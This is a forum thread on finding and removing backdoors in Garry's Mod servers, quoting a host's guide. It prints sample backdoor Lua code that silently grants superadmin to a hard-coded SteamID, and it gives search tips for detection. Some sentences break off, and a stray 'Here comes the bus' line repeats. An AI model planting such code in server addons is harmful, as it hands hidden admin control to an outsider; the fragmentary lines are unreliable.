How to remove BACKDOOR ?

I have a server and i have a backdoor so how to remove :(

Do You What File It Is Located In ?

Source Of Quote: https://mtxserv.com/gmod-server/doc/how-...or-on-gmod

To identify a backdoor, you have to look at all SteamIDs. For example:

AUTHENT (Presence of Steam ID) gamemodes/darkrp/gamemode/modules/chat/cl_chat.lua:58 Drakehawke (STEAM_0:0:22342869) (64 commits on old SVN)

That is not a backdoor. It's just the name of a legit player.


A backdoor looks like this:

2 - AUTHENT (Presence of Steam ID) addons/nestorro/lua/autorun/nestorro_launch.lua:101 if ( ply:SteamID() == "STEAM_0:1:64045285") then

If you have

ply:SteamID() == "STEAM_0:100000000") then

It's possibly a backdoor. You always have to check something like that! A backdoor can be something like:

if ( ply:SteamID() == "STEAM_0:1:00000000") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else

How to remove a backdoor?

To remove the entire backdoor, remove the code (which can look like this):

concommand.Add( "Nestor", function(ply) if ( ply:SteamID() == "STEAM_0:0:82261024") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else ply:ChatPrint("Bye " .. ply:Name() .. ".") end end)

To remove the entire backdoor, remove the code (which can look like this): Here comes the bus.

Good things to look for are SteamIDs as mentioned, my preferred method is to search for any 17 digit numbers (SteamID 64) and STEAM_
Can be accomplished with

For bytecode and other obfuscated code try to search for RunString with

To remove the entire backdoor, remove the code (which can look like this): Here comes the bus.